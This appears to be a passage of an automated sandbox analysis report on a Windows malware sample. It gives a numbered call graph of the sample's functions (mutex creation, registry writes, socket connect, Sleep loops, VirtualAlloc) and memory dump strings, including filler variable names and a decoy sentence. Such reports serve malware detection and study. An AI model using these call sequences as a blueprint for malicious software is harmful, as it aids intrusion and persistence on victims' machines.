251052 27988->27989 27990 25d77d SHGetSpecialFolderPathW 27989->27990 27991 253412 4 API calls 27990->27991 27992 25d7a0 27991->27992 27992->27651 27993->27661 27994->27669 27995->27691 27997 2531b1 lstrlenW 27996->27997 27998 253064 27997->27998 27999 252dc1 6 API calls 27998->27999 28000 25306d 27999->28000 28000->27697 28002 25efd5 RegSetValueExW 28001->28002 28003 25eff4 28001->28003 28002->28003 28003->27705 28005 2531b1 lstrlenW 28004->28005 28006 252e22 28005->28006 28007 252dc1 6 API calls 28006->28007 28008 252e2b 28007->28008 28008->27680 28009->27676 28010->27662 28011->27668 28012->27677 28013->27688 28014->27981 28016 2531ec 4 API calls 28015->28016 28017 253102 28016->28017 28027 252eca 28017->28027 28020 253162 5 API calls 28021 253111 28020->28021 28044 255a2d VirtualFree 28021->28044 28023 253119 28045 255a2d VirtualFree 28023->28045 28025 253125 28026 2510c1 GetProcessHeap HeapFree 28025->28026 28026->27985 28046 252eb9 28027->28046 28029 252ee1 28030 252f49 28029->28030 28031 252eb9 lstrlenA 28029->28031 28030->28020 28032 252eee MultiByteToWideChar 28031->28032 28033 2559aa VirtualAlloc 28032->28033 28034 252f08 28033->28034 28035 252eb9 lstrlenA 28034->28035 28036 252f12 MultiByteToWideChar 28035->28036 28037 253412 4 API calls 28036->28037 28038 252f31 28037->28038 28039 253264 3 API calls 28038->28039 28040 252f3a 28039->28040 28049 255a2d VirtualFree 28040->28049 28042 252f42 28050 255a2d VirtualFree 28042->28050 28044->28023 28045->28025 28047 252ec7 28046->28047 28048 252ebe lstrlenA 28046->28048 28047->28029 28048->28029 28049->28042 28050->28030 28051->27712 28052->27719 28054 252e66 2 API calls 28053->28054 28055 2557aa 28054->28055 28066 255a2d VirtualFree 28055->28066 28057 2557b2 28067 255a2d VirtualFree 28057->28067 28059 2557bf 28068 255a2d VirtualFree 28059->28068 28061 2557ca 28069 255a2d VirtualFree 28061->28069 28063 2557d5 28070 255a2d VirtualFree 28063->28070 28065 2557e0 28066->28057 28067->28059 28068->28061 28069->28063 28070->28065 28071 12e12e6 28072 12e12f2 ___DestructExceptionObject 28071->28072 28102 12e14ff 28072->28102 28074 12e12f9 28075 12e144c 28074->28075 28078 12e1323 28074->28078 28134 12e1817 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 28075->28134 28077 12e1453 28135 12e53f7 29 API calls pre_c_initialization 28077->28135 28088 12e1362 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 28078->28088 28113 12e50af 28078->28113 28080 12e1459 28136 12e53a9 29 API calls pre_c_initialization 28080->28136 28084 12e1461 28085 12e1342 28087 12e13c3 28121 12e1931 28087->28121 28088->28087 28130 12e53bf 39 API calls pre_c_initialization 28088->28130 28093 12e13d2 28094 12e13de 28093->28094 28131 12e1967 GetModuleHandleW 28094->28131 28096 12e13e5 28096->28077 28097 12e13e9 28096->28097 28098 12e13f2 28097->28098 28132 12e539a 29 API calls pre_c_initialization 28097->28132 28133 12e168e 77 API calls 2 library calls 28098->28133 28101 12e13fa 28101->28085 28103 12e1508 28102->28103 28137 12e1abb IsProcessorFeaturePresent 28103->28137 28105 12e1514 28138 12e1f27 28105->28138 28107 12e1519 28108 12e151d 28107->28108 28147 12e5a49 28107->28147 28108->28074 28111 12e1534 28111->28074 28114 12e50c6 28113->28114 28115 12e1c5e _ValidateLocalCookies 5 API calls 28114->28115 28116 12e133c 28115->28116 28116->28085 28117 12e5053 28116->28117 28118 12e5082 28117->28118 28119 12e1c5e _ValidateLocalCookies 5 API calls 28118->28119 28120 12e50ab 28119->28120 28120->28088 28278 12e1f70 28121->28278 28123 12e1944 GetStartupInfoW 28124 12e13c9 28123->28124 28125 12e5000 28124->28125 28279 12e8f80 28125->28279 28127 12e5043 28127->28093 28129 12e5009 28129->28127 28285 12e92af 39 API calls 28129->28285 28130->28087 28131->28096 28132->28098 28133->28101 28134->28077 28135->28080 28136->28084 28137->28105 28139 12e1f2c ___vcrt_initialize_winapi_thunks 28138->28139 28151 12e22fe 28139->28151 28143 12e1f42 28144 12e1f4d 28143->28144 28165 12e233a DeleteCriticalSection 28143->28165 28144->28107 28146 12e1f3a 28146->28107 28193 12e9ee2 28147->28193 28150 12e1f50 8 API calls 3 library calls 28150->28108 28152 12e2307 28151->28152 28154 12e2330 28152->28154 28155 12e1f36 28152->28155 28166 12e2550 28152->28166 28171 12e233a DeleteCriticalSection 28154->28171 28155->28146 28157 12e22b0 28155->28157 28186 12e249c 28157->28186 28160 12e22c5 28160->28143 28162 12e22d3 28163 12e22e0 28162->28163 28192 12e22e3 6 API calls ___vcrt_FlsFree 28162->28192 28163->28143 28165->28146 28172 12e242d 28166->28172 28168 12e256a 28169 12e2588 InitializeCriticalSectionAndSpinCount 28168->28169 28170 12e2573 28168->28170 28169->28170 28170->28152 28171->28155 28173 12e2455 28172->28173 28174 12e2451 __crt_fast_encode_pointer 28172->28174 28173->28174 28179 12e2369 28173->28179 28174->28168 28177 12e246f GetProcAddress 28177->28174 28178 12e247f __crt_fast_encode_pointer 28177->28178 28178->28174 28181 12e2378 try_get_first_available_module 28179->28181 28180 12e2395 LoadLibraryExW 28180->28181 28182 12e23b0 GetLastError 28180->28182 28181->28180 28183 12e240b FreeLibrary 28181->28183 28184 12e2422 28181->28184 28185 12e23e3 LoadLibraryExW 28181->28185 28182->28181 28183->28181 28184->28174 28184->28177 28185->28181 28187 12e242d try_get_function 5 API calls 28186->28187 28188 12e24b6 28187->28188 28189 12e24cf TlsAlloc 28188->28189 28190 12e22ba 28188->28190 28190->28160 28191 12e2512 6 API calls try_get_function 28190->28191 28191->28162 28192->28160 28196 12e9eff 28193->28196 28197 12e9efb 28193->28197 28195 12e1526 28195->28111 28195->28150 28196->28197 28199 12e6c48 28196->28199 28211 12e1c5e 28197->28211 28200 12e6c54 ___DestructExceptionObject 28199->28200 28218 12e93db EnterCriticalSection 28200->28218 28202 12e6c5b 28219 12e951c 28202->28219 28204 12e6c6a 28210 12e6c79 28204->28210 28232 12e6adc 29 API calls 28204->28232 28207 12e6c74 28233 12e6b94 GetStdHandle GetFileType 28207->28233 28208 12e6c8a __onexit 28208->28196 28234 12e6c95 LeaveCriticalSection __onexit 28210->28234 28212 12e1c69 IsProcessorFeaturePresent 28211->28212 28213 12e1c67 28211->28213 28215 12e1cab 28212->28215 28213->28195 28277 12e1c6f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28215->28277 28217 12e1d8e 28217->28195 28218->28202 28220 12e9528 ___DestructExceptionObject 28219->28220 28221 12e9548 28220->28221 28222 12e9531 28220->28222 28235 12e93db EnterCriticalSection 28221->28235 28243 12e621a 20 API calls __dosmaperr 28222->28243 28225 12e9536 28244 12e615d 26 API calls __cftof 28225->28244 28227 12e9540 __onexit 28227->28204 28228 12e9580 28245 12e95a7 LeaveCriticalSection __onexit 28228->28245 28230 12e9554 28230->28228 28236 12e946d 28230->28236 28232->28207 28233->28210 28234->28208 28235->28230 28246 12e622d 28236->28246 28238 12e947f 28242 12e948c 28238->28242 28253 12e65f4 28238->28253 28240 12e94de 28240->28230 28260 12e628a 20 API calls _free 28242->28260 28243->28225 28244->28227 28245->28227 28252 12e623a pre_c_initialization 28246->28252 28247 12e627a 28262 12e621a 20 API calls __dosmaperr 28247->28262 28248 12e6265 RtlAllocateHeap 28250 12e6278 28248->28250 28248->28252 28250->28238 28252->28247 28252->28248 28261 12e9fbc 7 API calls 2 library calls 28252->28261 28263 12e63c0 28253->28263 28256 12e6639 InitializeCriticalSectionAndSpinCount 28257 12e6624 28256->28257 28258 12e1c5e _ValidateLocalCookies 5 API calls 28257->28258 28259 12e6650 28258->28259 28259->28238 28260->28240 28261->28252 28262->28250 28264 12e63ed 28263->28264 28268 12e63e9 28263->28268 28264->28268 28270 12e62f8 28264->28270 28267 12e6407 GetProcAddress 28267->28268 28269 12e6417 __crt_fast_encode_pointer 28267->28269 28268->28256 28268->28257 28269->28268 28275 12e6309 try_get_first_available_module 28270->28275 28271 12e63b3 28271->28267 28271->28268 28272 12e6326 LoadLibraryExW 28273 12e6341 GetLastError 28272->28273 28272->28275 28273->28275 28274 12e639c FreeLibrary 28274->28275 28275->28271 28275->28272 28275->28274 28276 12e6374 LoadLibraryExW 28275->28276 28276->28275 28277->28217 28278->28123 28280 12e8f89 28279->28280 28281 12e8fbb 28279->28281 28286 12e7867 28280->28286 28281->28129 28285->28129 28287 12e7878 28286->28287 28288 12e7872 28286->28288 28294 12e787e 28287->28294 28330 12e659b 11 API calls 2 library calls 28287->28330 28329 12e6545 11 API calls 2 library calls 28288->28329 28291 12e7892 28292 12e622d pre_c_initialization 20 API calls 28291->28292 28291->28294 28295 12e78a2 28292->28295 28296 12e78f7 28294->28296 28337 12e5b9d 39 API calls pre_c_initialization 28294->28337 28298 12e78bf 28295->28298 28299 12e78aa 28295->28299 28311 12e8dd2 28296->28311 28333 12e659b 11 API calls 2 library calls 28298->28333 28331 12e659b 11 API calls 2 library calls 28299->28331 28302 12e78b6 28332 12e628a 20 API calls _free 28302->28332 28303 12e78cb 28304 12e78de 28303->28304 28305 12e78cf 28303->28305 28335 12e75dd 20 API calls pre_c_initialization 28304->28335 28334 12e659b 11 API calls 2 library calls 28305->28334 28309 12e78e9 28336 12e628a 20 API calls _free 28309->28336 28338 12e8eed 28311->28338 28313 12e8de5 28345 12e8b66 28313->28345 28316 12e8dfe 28316->28281 28322 12e8e3c 28372 12e621a 20 API calls __dosmaperr 28322->28372 28324 12e8e41 28373 12e628a 20 API calls _free 28324->28373 28325 12e8e59 28326 12e8e85 28325->28326 28374 12e628a 20 API calls _free 28325->28374 28326->28324 28375 12e8a62 26 API calls 2 library calls 28326->28375 28329->28287 28330->28291 28331->28302 28332->28294 28333->28303 28334->28302 28335->28309 28336->28294 28339 12e8ef9 ___DestructExceptionObject 28338->28339 28341 12e8f78 __onexit 28339->28341 28376 12e5b9d 39 API calls pre_c_initialization 28339->28376 28377 12e93db EnterCriticalSection 28339->28377 28378 12e628a 20 API calls _free 28339->28378 28379 12e8f6f LeaveCriticalSection __onexit 28339->28379 28341->28313 28380 12e375f 28345->28380 28348 12e8b99 28350 12e8b9e GetACP 28348->28350 28351 12e8bb0 28348->28351 28349 12e8b87 GetOEMCP 28349->28351 28350->28351 28351->28316 28352 12e6edf 28351->28352 28353 12e6f1d 28352->28353 28354 12e6eed 28352->28354 28392 12e621a 20 API calls __dosmaperr 28353->28392 28356 12e6f08 HeapAlloc 28354->28356 28359 12e6ef1 pre_c_initialization 28354->28359 28358 12e6f1b 28356->28358 28356->28359 28357 12e6f22 28357->28324 28361 12e8fdb 28357->28361 28358->28357 28359->28353 28359->28356 28391 12e9fbc 7 API calls 2 library calls 28359->28391 28362 12e8b66 41 API calls 28361->28362 28363 12e8ffa 28362->28363 28366 12e904a GetACP 28363->28366 28367 12e9058 IsValidCodePage 28363->28367 28369 12e9004 28363->28369 28371 12e907d ___scrt_fastfail 28363->28371 28364 12e1c5e _ValidateLocalCookies 5 API calls 28365 12e8e34 28364->28365 28365->28322 28365->28325 28366->28367 28366->28369 28368 12e906a GetCPInfo 28367->28368 28367->28369 28368->28369 28368->28371 28369->28364 28393 12e8c3e GetCPInfo 28371->28393 28372->28324 28373->28316 28374->28326 28375->28324 28377->28339 28378->28339 28379->28339 28381 12e377c 28380->28381 28387 12e3772 28380->28387 28381->28387 28388 12e77b3 39 API calls 2 library calls 28381->28388 28383 12e379d 28389 12e79fa 39 API calls __cftof 28383->28389 28385 12e37b6 28390 12e7a27 39 API calls __cftof 28385->28390 28387->28348 28387->28349 28388->28383 28389->28385 28390->28387 28391->28359 28392->28357 28399 12e8c78 28393->28399 28402 12e8d22 28393->28402 28396 12e1c5e _ValidateLocalCookies 5 API calls 28398 12e8dce 28396->28398 28398->28369 28403 12e999a 28399->28403 28401 12eb6f3 __vfwprintf_l 44 API calls 28401->28402 28402->28396 28404 12e375f __cftof 39 API calls 28403->28404 28405 12e99ba MultiByteToWideChar 28404->28405 28407 12e9a77 28405->28407 28408 12e99f3 28405->28408 28409 12e1c5e _ValidateLocalCookies 5 API calls 28407->28409 28411 12e6edf __vfwprintf_l 21 API calls 28408->28411 28415 12e9a0b ___scrt_fastfail __vfwprintf_l 28408->28415 28412 12e8cd9 28409->28412 28410 12e9a71 28422 12e9a9e 20 API calls _free 28410->28422 28411->28415 28417 12eb6f3 28412->28417 28414 12e9a47 MultiByteToWideChar 28414->28410 28416 12e9a61 GetStringTypeW 28414->28416 28415->28410 28415->28414 28416->28410 28418 12e375f __cftof 39 API calls 28417->28418 28419 12eb706 28418->28419 28423 12eb50d 28419->28423 28422->28407 28424 12eb528 __vfwprintf_l 28423->28424 28425 12eb54e MultiByteToWideChar 28424->28425 28426 12eb6cb 28425->28426 28427 12eb57a 28425->28427 28428 12e1c5e _ValidateLocalCookies 5 API calls 28426->28428 28432 12e6edf __vfwprintf_l 21 API calls 28427->28432 28436 12eb58f __vfwprintf_l 28427->28436 28429 12e8cfa 28428->28429 28429->28401 28430 12eb5c7 MultiByteToWideChar 28431 12eb632 28430->28431 28433 12eb5de 28430->28433 28459 12e9a9e 20 API calls _free 28431->28459 28432->28436 28450 12e6656 28433->28450 28436->28430 28436->28431 28438 12eb609 28438->28431 28442 12e6656 __vfwprintf_l 11 API calls 28438->28442 28439 12eb641 28440 12e6edf __vfwprintf_l 21 API calls 28439->28440 28444 12eb653 __vfwprintf_l 28439->28444 28440->28444 28441 12eb6bc 28458 12e9a9e 20 API calls _free 28441->28458 28442->28431 28444->28441 28445 12e6656 __vfwprintf_l 11 API calls 28444->28445 28446 12eb69b 28445->28446 28446->28441 28447 12eb6aa WideCharToMultiByte 28446->28447 28447->28441 28448 12eb6ea 28447->28448 28460 12e9a9e 20 API calls _free 28448->28460 28461 12e62c4 28450->28461 28453 12e6672 28456 12e1c5e _ValidateLocalCookies 5 API calls 28453->28456 28455 12e66b2 LCMapStringW 28455->28453 28457 12e66c4 28456->28457 28457->28431 28457->28438 28457->28439 28458->28431 28459->28426 28460->28431 28462 12e63c0 pre_c_initialization 5 API calls 28461->28462 28463 12e62da 28462->28463 28463->28453 28464 12e66ca 10 API calls 2 library calls 28463->28464 28464->28455 28465 12f1106 WSAStartup socket 28466 12f113c inet_addr htons connect 28465->28466 28467 12f1137 28465->28467 28468 12f1100 28466->28468 28468->28465 28469 12f6aa6 28470 12f6abb 28469->28470 28472 12f6b95 28470->28472 28507 12e1040 79 API calls __vfwprintf_l 28470->28507 28474 12f6c24 28472->28474 28508 12e1040 79 API calls __vfwprintf_l 28472->28508 28476 12f6f17 28474->28476 28509 12e1040 79 API calls __vfwprintf_l 28474->28509 28480 12f707f 28476->28480 28510 12e1040 79 API calls __vfwprintf_l 28476->28510 28481 12f717c 28480->28481 28511 12e1040 79 API calls __vfwprintf_l 28480->28511 28483 12f71cc 28481->28483 28512 12e1040 79 API calls __vfwprintf_l 28481->28512 28482 12f72c0 28489 12f7331 28482->28489 28514 12e1040 79 API calls __vfwprintf_l 28482->28514 28483->28482 28513 12e1040 79 API calls __vfwprintf_l 28483->28513 28487 12f7498 28490 12f74e8 28487->28490 28516 12e1040 79 API calls __vfwprintf_l 28487->28516 28489->28487 28515 12e1040 79 API calls __vfwprintf_l 28489->28515 28493 12f7614 28490->28493 28517 12e1040 79 API calls __vfwprintf_l 28490->28517 28495 12f7707 28493->28495 28518 12e1040 79 API calls __vfwprintf_l 28493->28518 28496 12f77a9 28495->28496 28519 12e1040 79 API calls __vfwprintf_l 28495->28519 28498 12f781b 28496->28498 28520 12e1040 79 API calls __vfwprintf_l 28496->28520 28499 12f78c2 Sleep 28498->28499 28504 12f78cf 28498->28504 28499->28498 28500 12f79f6 28523 1301280 79 API calls 28500->28523 28502 12f7a08 28505 12f79a6 28504->28505 28521 12e1040 79 API calls __vfwprintf_l 28504->28521 28505->28500 28522 12e1040 79 API calls __vfwprintf_l 28505->28522 28507->28470 28508->28472 28509->28474 28510->28476 28511->28480 28512->28481 28513->28483 28514->28482 28515->28489 28516->28487 28517->28490 28518->28493 28519->28495 28520->28496 28521->28504 28522->28505 28523->28502 28524 25118f 28527 2601ce 28524->28527 28534 25e236 CreateMutexA 28527->28534 28529 2601e3 28535 255adb GetProcessHeap HeapAlloc 28529->28535 28531 2601eb 28532 251194 28531->28532 28536 260c9a 28531->28536 28534->28529 28535->28531 28548 255adb GetProcessHeap HeapAlloc 28536->28548 28538 260cba 28549 255adb GetProcessHeap HeapAlloc 28538->28549 28540 260cf0 28550 2606d5 CoInitialize CoCreateInstance 28540->28550 28541 260ce4 28541->28540 28559 260430 GetProcessHeap HeapAlloc 28541->28559 28545 260d02 28546 260d10 28545->28546 28560 260500 12 API calls 28545->28560 28546->28532 28548->28538 28549->28541 28551 26082c 28550->28551 28557 260715 28550->28557 28551->28545 28551->28546 28553 26075c VariantInit 28553->28557 28554 260806 CoUninitialize 28554->28551 28557->28551 28557->28553 28557->28554 28557->28557 28561 255adb GetProcessHeap HeapAlloc 28557->28561 28562 26098d GetProcessHeap HeapAlloc 28557->28562 28563 25239f GetProcessHeap HeapAlloc 28557->28563 28559->28540 28560->28545 28561->28557 28562->28557 28563->28557 28564 12e1462 28567 12e1753 28564->28567 28566 12e1467 28566->28566 28568 12e1769 28567->28568 28570 12e1772 28568->28570 28571 12e1706 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId RtlQueryPerformanceCounter 28568->28571 28570->28566 28571->28570 28572 12f7a20 28573 12f7a3c 28572->28573 28574 12f7b65 VirtualAlloc 28573->28574 28575 12f7b94 _strlen 28574->28575 28576 25b66a DeleteCriticalSection 28577 25b685 28576->28577 28578 25b67e CloseHandle 28576->28578 28579 25b695 28577->28579 28580 25b68e CloseHandle 28577->28580 28578->28577 28583 25510d WSACleanup 28579->28583 28580->28579 28590 25e221 ReleaseMutex CloseHandle 28583->28590 28585 255121 28586 252e66 2 API calls 28585->28586 28587 255129 28586->28587 28588 252e66 2 API calls 28587->28588 28589 255131 28588->28589 28590->28585 28591 258c74 28592 255a2d VirtualFree 28591->28592 28593 258c7f 28591->28593 28594 260a57 28595 260a62 28594->28595 28596 260ac2 OleUninitialize 28595->28596 28597 12e4dfc 28598 12e8f80 53 API calls 28597->28598 28599 12e4e0e 28598->28599 28608 12e9317 GetEnvironmentStringsW 28599->28608 28604 12e4e48 28605 12e4e24 28621 12e628a 20 API calls _free 28605->28621 28607 12e4e19 28622 12e628a 20 API calls _free 28607->28622 28609 12e932e 28608->28609 28619 12e9381 28608->28619 28610 12e9334 WideCharToMultiByte 28609->28610 28613 12e9350 28610->28613 28610->28619 28611 12e938a FreeEnvironmentStringsW 28612 12e4e13 28611->28612 28612->28607 28620 12e4e4e 26 API calls 4 library calls 28612->28620 28614 12e6edf __vfwprintf_l 21 API calls 28613->28614 28615 12e9356 28614->28615 28616 12e935d WideCharToMultiByte 28615->28616 28617 12e9373 28615->28617 28616->28617 28623 12e628a 20 API calls _free 28617->28623 28619->28611 28619->28612 28620->28605 28621->28607 28622->28604 28623->28619 28624 12e939a 28625 12e93a5 28624->28625 28626 12e65f4 11 API calls 28625->28626 28627 12e93ce 28625->28627 28628 12e93ca 28625->28628 28626->28625 28630 12e93f2 DeleteCriticalSection 28627->28630 28630->28628 28631 12e79b4 28639 12e6499 28631->28639 28634 12e79c8 28636 12e79d0 28637 12e79dd 28636->28637 28647 12e79e0 11 API calls 28636->28647 28640 12e63c0 pre_c_initialization 5 API calls 28639->28640 28641 12e64c0 28640->28641 28642 12e64d8 TlsAlloc 28641->28642 28644 12e64c9 28641->28644 28642->28644 28643 12e1c5e _ValidateLocalCookies 5 API calls 28645 12e64e9 28643->28645 28644->28643 28645->28634 28646 12e7901 20 API calls 2 library calls 28645->28646 28646->28636 28647->28634 28648 12e12d4 28653 12e19aa SetUnhandledExceptionFilter 28648->28653 28650 12e12d9 pre_c_initialization 28654 12e554a 26 API calls 2 library calls 28650->28654 28652 12e12e4 28653->28650 28654->28652 28655 25119e 28658 261824 28655->28658 28731 252460 28658->28731 28661 252460 VirtualAlloc 28662 261841 28661->28662 28663 252460 VirtualAlloc 28662->28663 28664 26184b 28663->28664 28665 252460 VirtualAlloc 28664->28665 28666 261855 28665->28666 28667 252460 VirtualAlloc 28666->28667 28668 26185f 28667->28668 28669 252460 VirtualAlloc 28668->28669 28670 261869 28669->28670 28734 2510ad GetProcessHeap HeapAlloc 28670->28734 28672 261890 28735 2510ad GetProcessHeap HeapAlloc 28672->28735 28674 261899 28736 2510ad GetProcessHeap HeapAlloc 28674->28736 28676 2618a2 28737 2510ad GetProcessHeap HeapAlloc 28676->28737 28678 2618ab 28738 2510ad GetProcessHeap HeapAlloc 28678->28738 28680 2618b5 28739 2510ad GetProcessHeap HeapAlloc 28680->28739 28682 2618bf 28740 25fadf 28682->28740 28685 25fadf 2 API calls 28686 2618d0 28685->28686 28687 25fadf 2 API calls 28686->28687 28688 2618d7 28687->28688 28689 25fadf 2 API calls 28688->28689 28690 2618df 28689->28690 28691 25fadf 2 API calls 28690->28691 28692 2618e7 28691->28692 28693 25fadf 2 API calls 28692->28693 28694 2618ef 28693->28694 28695 2531ec 4 API calls 28694->28695 28696 2618fb 28695->28696 28744 25dd40 28696->28744 28698 261906 28747 255a2d VirtualFree 28698->28747 28700 26190e 28701 2531ec 4 API calls 28700->28701 28702 261918 28701->28702 28703 25dd40 5 API calls 28702->28703 28704 261923 28703->28704 28748 255a2d VirtualFree 28704->28748 28706 26192b 28707 2531ec 4 API calls 28706->28707 28708 261935 28707->28708 28709 25dd40 5 API calls 28708->28709 28710 261940 28709->28710 28749 255a2d VirtualFree 28710->28749 28712 261948 28713 2531ec 4 API calls 28712->28713 28714 261954 28713->28714 28715 25dd40 5 API calls 28714->28715 28716 26195f 28715->28716 28750 255a2d VirtualFree 28716->28750 28718 261967 28719 2531ec 4 API calls 28718->28719 28720 261973 28719->28720 28721 25dd40 5 API calls 28720->28721 28722 26197e 28721->28722 28751 255a2d VirtualFree 28722->28751 28724 261986 28725 2531ec 4 API calls 28724->28725 28726 261992 28725->28726 28727 25dd40 5 API calls 28726->28727 28728 26199d 28727->28728 28752 255a2d VirtualFree 28728->28752 28730 2511a3 28753 25dd6c 28731->28753 28734->28672 28735->28674 28736->28676 28737->28678 28738->28680 28739->28682 28741 25fae5 28740->28741 28743 25fb02 28741->28743 28756 25fb09 Sleep GetTickCount 28741->28756 28743->28685 28757 252f52 28744->28757 28747->28700 28748->28706 28749->28712 28750->28718 28751->28724 28752->28730 28754 252ff0 VirtualAlloc 28753->28754 28755 252473 28754->28755 28755->28661 28756->28741 28765 255a2d VirtualFree 28757->28765 28759 252f60 28760 252f84 CreateEventA 28759->28760 28766 25319f lstrlenA 28759->28766 28760->28698 28762 252f72 28763 2559aa VirtualAlloc 28762->28763 28764 252f79 lstrcatA 28763->28764 28764->28760 28765->28759 28766->28762

                                      Executed Functions

                                      Function 012F7A20, Relevance: 511.8, APIs: 2, Strings: 289, Instructions: 2543memoryUNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,012F0BBA,00003000,00000004), ref: 012F7B75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: In 2010 the government approved a 3.4 billion settlement for the trust case Major portions of the settlement were to partially compensate individual account holders and to buy back fractionated land interests and restore land to reservations$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 4275171209-94128256
                                      • Opcode ID: 8c52ca6c9fe9b48a34e186c163c830a292d81838e24ca7777649b20f6c9a1983
                                      • Instruction ID: 7135f06ce61a4c32c8b97584fc02fcfb6e499ec8534753240b351fdc77e57be9
                                      • Opcode Fuzzy Hash: 8c52ca6c9fe9b48a34e186c163c830a292d81838e24ca7777649b20f6c9a1983
                                      • Instruction Fuzzy Hash: 58F286F7A403007AF32A72296C63F7736ADC396B4CF984548F5249A3C7F566E9104368
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012F6AA6, Relevance: 155.8, APIs: 1, Strings: 102, Instructions: 1267sleepUNIQUE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
